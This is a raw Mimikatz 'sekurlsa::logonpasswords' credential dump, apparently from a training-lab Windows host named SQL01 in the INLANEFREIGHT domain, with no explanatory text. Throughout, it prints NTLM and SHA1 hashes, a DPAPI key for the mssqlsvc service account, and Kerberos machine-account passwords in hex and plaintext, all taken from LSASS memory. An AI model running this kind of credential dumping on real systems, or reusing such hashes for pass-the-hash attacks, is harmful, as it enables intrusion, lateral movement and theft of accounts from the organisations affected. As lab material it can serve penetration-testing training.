mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 40750 (00000000:00009f2e)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 5/1/2026 4:50:10 AM
SID               :
	msv :	
	 [00000003] Primary
	 * Username : SQL01$
	 * Domain   : INLANEFREIGHT
	 * NTLM     : 725cf41508f70a5a88950469dce2d0fb
	 * SHA1     : 8fe03b92ece20db0d65a5679024dba01cdd0809f
	tspkg :
	wdigest :	
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 229431 (00000000:00038037)
Session           : Interactive from 1
User Name         : mssqlsvc
Domain            : INLANEFREIGHT
Logon Server      : DC01
Logon Time        : 5/1/2026 4:50:50 AM
SID               : S-1-5-21-3327542485-274640656-2609762496-4613
	msv :	
	 [00000003] Primary
	 * Username : mssqlsvc
	 * Domain   : INLANEFREIGHT
	 * NTLM     : 8c9555327d95f815987c0d81238c7660
	 * SHA1     : 0a8d7e8141b816c8b20b4762da5b4ee7038b515c
	 * DPAPI    : a1568414db09f65c238b7557bc3ceeb8
	tspkg :
	wdigest :	
	 * Username : mssqlsvc
	 * Domain   : INLANEFREIGHT
	 * Password : (null)
	kerberos :	
	 * Username : mssqlsvc
	 * Domain   : INLANEFREIGHT.LOCAL
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 116220 (00000000:0001c5fc)
Session           : Service from 0
User Name         : MSSQL$SQLEXPRESS
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 5/1/2026 4:50:11 AM
SID               : S-1-5-80-3880006512-4290199581-1648723128-3569869737-3631323133
	msv :	
	 [00000003] Primary
	 * Username : SQL01$
	 * Domain   : INLANEFREIGHT
	 * NTLM     : 725cf41508f70a5a88950469dce2d0fb
	 * SHA1     : 8fe03b92ece20db0d65a5679024dba01cdd0809f
	tspkg :
	wdigest :	
	 * Username : SQL01$
	 * Domain   : INLANEFREIGHT
	 * Password : (null)
	kerberos :	
	 * Username : SQL01$
	 * Domain   : INLANEFREIGHT.LOCAL
	 * Password : fe 32 d1 e6 8a 3d 9b 9a 93 1e 9d 19 8b 36 9e 94 4c fe 9a a7 b4 fb 83 c0 ed 97 35 c6 07 1e 94 d7 56 6e c2 86 20 58 7d 12 c6 71 da e8 e4 ec c9 22 05 3e 1d 24 1d ba 6d c5 16 b0 08 76 cb bd af 50 a7 d7 e5 17 a1 a5 24 9f 21 12 86 09 b4 f3 06 03 a0 29 e9 4b 21 4a 2f 52 f4 51 71 2a b4 f7 5c be 29 86 f1 2d db ec fd b5 0d 94 b1 65 ef 1c 92 0f f1 29 48 47 af 96 9d be 22 db e4 0c 94 fe 7c 4a c5 08 d2 97 04 9b c7 1f b1 f2 d0 1c 77 2d 0b 6a dc ad ce 05 09 9a 3c d5 94 4c da 03 52 5e 8e 3b 4a 99 03 ef de b3 c9 77 d3 d7 28 35 61 29 38 9a 37 6c b8 7a 75 bb f2 39 1f 2d a2 2c 4c 1d 6b 0a 1d 62 b1 6f ab 02 6f 3d b6 f1 42 d1 cf 77 70 1d 44 82 1a 6c 3a 34 8b 26 3c ed 08 50 1d 7f a5 e8 50 2e 48 d7 6b d2 3e 6e 1e 7c 62 da f0 ac b8 19
	ssp :	
	credman :	

Authentication Id : 0 ; 71662 (00000000:000117ee)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 5/1/2026 4:50:11 AM
SID               : S-1-5-90-0-1
	msv :	
	 [00000003] Primary
	 * Username : SQL01$
	 * Domain   : INLANEFREIGHT
	 * NTLM     : 6991907663e3f68922d24ac9a573e2c3
	 * SHA1     : 33058b24d5882f1dd18ce81988aa64226e2879b5
	tspkg :
	wdigest :	
	 * Username : SQL01$
	 * Domain   : INLANEFREIGHT
	 * Password : (null)
	kerberos :	
	 * Username : SQL01$
	 * Domain   : INLANEFREIGHT.LOCAL
	 * Password : ;6bu^ur;mJ&ES&#Iu)CQZeckLZsyN >AgIv4DZ^&EX,Wu.ahRkT%c3)R+c&xcu_:]n#V1V.j[=+GTjk?l)z OaU8!c^\#`s?8/E!xy^itE>kYiBcSgohVb$P
	ssp :	
	credman :	

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : SQL01$
Domain            : INLANEFREIGHT
Logon Server      : (null)
Logon Time        : 5/1/2026 4:50:10 AM
SID               : S-1-5-18
	msv :	
	tspkg :
	wdigest :	
	 * Username : SQL01$
	 * Domain   : INLANEFREIGHT
	 * Password : (null)
	kerberos :	
	 * Username : sql01$
	 * Domain   : INLANEFREIGHT.LOCAL
	 * Password : fe 32 d1 e6 8a 3d 9b 9a 93 1e 9d 19 8b 36 9e 94 4c fe 9a a7 b4 fb 83 c0 ed 97 35 c6 07 1e 94 d7 56 6e c2 86 20 58 7d 12 c6 71 da e8 e4 ec c9 22 05 3e 1d 24 1d ba 6d c5 16 b0 08 76 cb bd af 50 a7 d7 e5 17 a1 a5 24 9f 21 12 86 09 b4 f3 06 03 a0 29 e9 4b 21 4a 2f 52 f4 51 71 2a b4 f7 5c be 29 86 f1 2d db ec fd b5 0d 94 b1 65 ef 1c 92 0f f1 29 48 47 af 96 9d be 22 db e4 0c 94 fe 7c 4a c5 08 d2 97 04 9b c7 1f b1 f2 d0 1c 77 2d 0b 6a dc ad ce 05 09 9a 3c d5 94 4c da 03 52 5e 8e 3b 4a 99 03 ef de b3 c9 77 d3 d7 28 35 61 29 38 9a 37 6c b8 7a 75 bb f2 39 1f 2d a2 2c 4c 1d 6b 0a 1d 62 b1 6f ab 02 6f 3d b6 f1 42 d1 cf 77 70 1d 44 82 1a 6c 3a 34 8b 26 3c ed 08 50 1d 7f a5 e8 50 2e 48 d7 6b d2 3e 6e 1e 7c 62 da f0 ac b8 19
	ssp :	
	credman :	

Authentication Id : 0 ; 115177 (00000000:0001c1e9)
Session           : Service from 0
User Name         : SQLTELEMETRY$SQLEXPRESS
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 5/1/2026 4:50:11 AM
SID               : S-1-5-80-1985561900-798682989-2213159822-1904180398-3434236965
	msv :	
	 [00000003] Primary
	 * Username : SQL01$
	 * Domain   : INLANEFREIGHT
	 * NTLM     : 725cf41508f70a5a88950469dce2d0fb
	 * SHA1     : 8fe03b92ece20db0d65a5679024dba01cdd0809f
	tspkg :
	wdigest :	
	 * Username : SQL01$
	 * Domain   : INLANEFREIGHT
	 * Password : (null)
	kerberos :	
	 * Username : SQL01$
	 * Domain   : INLANEFREIGHT.LOCAL
	 * Password : fe 32 d1 e6 8a 3d 9b 9a 93 1e 9d 19 8b 36 9e 94 4c fe 9a a7 b4 fb 83 c0 ed 97 35 c6 07 1e 94 d7 56 6e c2 86 20 58 7d 12 c6 71 da e8 e4 ec c9 22 05 3e 1d 24 1d ba 6d c5 16 b0 08 76 cb bd af 50 a7 d7 e5 17 a1 a5 24 9f 21 12 86 09 b4 f3 06 03 a0 29 e9 4b 21 4a 2f 52 f4 51 71 2a b4 f7 5c be 29 86 f1 2d db ec fd b5 0d 94 b1 65 ef 1c 92 0f f1 29 48 47 af 96 9d be 22 db e4 0c 94 fe 7c 4a c5 08 d2 97 04 9b c7 1f b1 f2 d0 1c 77 2d 0b 6a dc ad ce 05 09 9a 3c d5 94 4c da 03 52 5e 8e 3b 4a 99 03 ef de b3 c9 77 d3 d7 28 35 61 29 38 9a 37 6c b8 7a 75 bb f2 39 1f 2d a2 2c 4c 1d 6b 0a 1d 62 b1 6f ab 02 6f 3d b6 f1 42 d1 cf 77 70 1d 44 82 1a 6c 3a 34 8b 26 3c ed 08 50 1d 7f a5 e8 50 2e 48 d7 6b d2 3e 6e 1e 7c 62 da f0 ac b8 19
	ssp :	
	credman :	

Authentication Id : 0 ; 71643 (00000000:000117db)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 5/1/2026 4:50:11 AM
SID               : S-1-5-90-0-1
	msv :	
	 [00000003] Primary
	 * Username : SQL01$
	 * Domain   : INLANEFREIGHT
	 * NTLM     : 725cf41508f70a5a88950469dce2d0fb
	 * SHA1     : 8fe03b92ece20db0d65a5679024dba01cdd0809f
	tspkg :
	wdigest :	
	 * Username : SQL01$
	 * Domain   : INLANEFREIGHT
	 * Password : (null)
	kerberos :	
	 * Username : SQL01$
	 * Domain   : INLANEFREIGHT.LOCAL
	 * Password : fe 32 d1 e6 8a 3d 9b 9a 93 1e 9d 19 8b 36 9e 94 4c fe 9a a7 b4 fb 83 c0 ed 97 35 c6 07 1e 94 d7 56 6e c2 86 20 58 7d 12 c6 71 da e8 e4 ec c9 22 05 3e 1d 24 1d ba 6d c5 16 b0 08 76 cb bd af 50 a7 d7 e5 17 a1 a5 24 9f 21 12 86 09 b4 f3 06 03 a0 29 e9 4b 21 4a 2f 52 f4 51 71 2a b4 f7 5c be 29 86 f1 2d db ec fd b5 0d 94 b1 65 ef 1c 92 0f f1 29 48 47 af 96 9d be 22 db e4 0c 94 fe 7c 4a c5 08 d2 97 04 9b c7 1f b1 f2 d0 1c 77 2d 0b 6a dc ad ce 05 09 9a 3c d5 94 4c da 03 52 5e 8e 3b 4a 99 03 ef de b3 c9 77 d3 d7 28 35 61 29 38 9a 37 6c b8 7a 75 bb f2 39 1f 2d a2 2c 4c 1d 6b 0a 1d 62 b1 6f ab 02 6f 3d b6 f1 42 d1 cf 77 70 1d 44 82 1a 6c 3a 34 8b 26 3c ed 08 50 1d 7f a5 e8 50 2e 48 d7 6b d2 3e 6e 1e 7c 62 da f0 ac b8 19
	ssp :	
	credman :	

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : SQL01$
Domain            : INLANEFREIGHT
Logon Server      : (null)
Logon Time        : 5/1/2026 4:50:10 AM
SID               : S-1-5-20
	msv :	
	 [00000003] Primary
	 * Username : SQL01$
	 * Domain   : INLANEFREIGHT
	 * NTLM     : 725cf41508f70a5a88950469dce2d0fb
	 * SHA1     : 8fe03b92ece20db0d65a5679024dba01cdd0809f
	tspkg :
	wdigest :	
	 * Username : SQL01$
	 * Domain   : INLANEFREIGHT
	 * Password : (null)
	kerberos :	
	 * Username : sql01$
	 * Domain   : INLANEFREIGHT.LOCAL
	 * Password : fe 32 d1 e6 8a 3d 9b 9a 93 1e 9d 19 8b 36 9e 94 4c fe 9a a7 b4 fb 83 c0 ed 97 35 c6 07 1e 94 d7 56 6e c2 86 20 58 7d 12 c6 71 da e8 e4 ec c9 22 05 3e 1d 24 1d ba 6d c5 16 b0 08 76 cb bd af 50 a7 d7 e5 17 a1 a5 24 9f 21 12 86 09 b4 f3 06 03 a0 29 e9 4b 21 4a 2f 52 f4 51 71 2a b4 f7 5c be 29 86 f1 2d db ec fd b5 0d 94 b1 65 ef 1c 92 0f f1 29 48 47 af 96 9d be 22 db e4 0c 94 fe 7c 4a c5 08 d2 97 04 9b c7 1f b1 f2 d0 1c 77 2d 0b 6a dc ad ce 05 09 9a 3c d5 94 4c da 03 52 5e 8e 3b 4a 99 03 ef de b3 c9 77 d3 d7 28 35 61 29 38 9a 37 6c b8 7a 75 bb f2 39 1f 2d a2 2c 4c 1d 6b 0a 1d 62 b1 6f ab 02 6f 3d b6 f1 42 d1 cf 77 70 1d 44 82 1a 6c 3a 34 8b 26 3c ed 08 50 1d 7f a5 e8 50 2e 48 d7 6b d2 3e 6e 1e 7c 62 da f0 ac b8 19
	ssp :	
	credman :	

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 5/1/2026 4:50:11 AM
SID               : S-1-5-19
	msv :	
	tspkg :
	wdigest :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 41917 (00000000:0000a3bd)
Session           : Interactive from 1
User Name         : UMFD-1
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 5/1/2026 4:50:10 AM
SID               : S-1-5-96-0-1
	msv :	
	 [00000003] Primary
	 * Username : SQL01$
	 * Domain   : INLANEFREIGHT
	 * NTLM     : 725cf41508f70a5a88950469dce2d0fb
	 * SHA1     : 8fe03b92ece20db0d65a5679024dba01cdd0809f
	tspkg :
	wdigest :	
	 * Username : SQL01$
	 * Domain   : INLANEFREIGHT
	 * Password : (null)
	kerberos :	
	 * Username : SQL01$
	 * Domain   : INLANEFREIGHT.LOCAL
	 * Password : fe 32 d1 e6 8a 3d 9b 9a 93 1e 9d 19 8b 36 9e 94 4c fe 9a a7 b4 fb 83 c0 ed 97 35 c6 07 1e 94 d7 56 6e c2 86 20 58 7d 12 c6 71 da e8 e4 ec c9 22 05 3e 1d 24 1d ba 6d c5 16 b0 08 76 cb bd af 50 a7 d7 e5 17 a1 a5 24 9f 21 12 86 09 b4 f3 06 03 a0 29 e9 4b 21 4a 2f 52 f4 51 71 2a b4 f7 5c be 29 86 f1 2d db ec fd b5 0d 94 b1 65 ef 1c 92 0f f1 29 48 47 af 96 9d be 22 db e4 0c 94 fe 7c 4a c5 08 d2 97 04 9b c7 1f b1 f2 d0 1c 77 2d 0b 6a dc ad ce 05 09 9a 3c d5 94 4c da 03 52 5e 8e 3b 4a 99 03 ef de b3 c9 77 d3 d7 28 35 61 29 38 9a 37 6c b8 7a 75 bb f2 39 1f 2d a2 2c 4c 1d 6b 0a 1d 62 b1 6f ab 02 6f 3d b6 f1 42 d1 cf 77 70 1d 44 82 1a 6c 3a 34 8b 26 3c ed 08 50 1d 7f a5 e8 50 2e 48 d7 6b d2 3e 6e 1e 7c 62 da f0 ac b8 19
	ssp :	
	credman :	

Authentication Id : 0 ; 41885 (00000000:0000a39d)
Session           : Interactive from 0
User Name         : UMFD-0
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 5/1/2026 4:50:10 AM
SID               : S-1-5-96-0-0
	msv :	
	 [00000003] Primary
	 * Username : SQL01$
	 * Domain   : INLANEFREIGHT
	 * NTLM     : 725cf41508f70a5a88950469dce2d0fb
	 * SHA1     : 8fe03b92ece20db0d65a5679024dba01cdd0809f
	tspkg :
	wdigest :	
	 * Username : SQL01$
	 * Domain   : INLANEFREIGHT
	 * Password : (null)
	kerberos :	
	 * Username : SQL01$
	 * Domain   : INLANEFREIGHT.LOCAL
	 * Password : fe 32 d1 e6 8a 3d 9b 9a 93 1e 9d 19 8b 36 9e 94 4c fe 9a a7 b4 fb 83 c0 ed 97 35 c6 07 1e 94 d7 56 6e c2 86 20 58 7d 12 c6 71 da e8 e4 ec c9 22 05 3e 1d 24 1d ba 6d c5 16 b0 08 76 cb bd af 50 a7 d7 e5 17 a1 a5 24 9f 21 12 86 09 b4 f3 06 03 a0 29 e9 4b 21 4a 2f 52 f4 51 71 2a b4 f7 5c be 29 86 f1 2d db ec fd b5 0d 94 b1 65 ef 1c 92 0f f1 29 48 47 af 96 9d be 22 db e4 0c 94 fe 7c 4a c5 08 d2 97 04 9b c7 1f b1 f2 d0 1c 77 2d 0b 6a dc ad ce 05 09 9a 3c d5 94 4c da 03 52 5e 8e 3b 4a 99 03 ef de b3 c9 77 d3 d7 28 35 61 29 38 9a 37 6c b8 7a 75 bb f2 39 1f 2d a2 2c 4c 1d 6b 0a 1d 62 b1 6f ab 02 6f 3d b6 f1 42 d1 cf 77 70 1d 44 82 1a 6c 3a 34 8b 26 3c ed 08 50 1d 7f a5 e8 50 2e 48 d7 6b d2 3e 6e 1e 7c 62 da f0 ac b8 19
	ssp :	
	credman :	


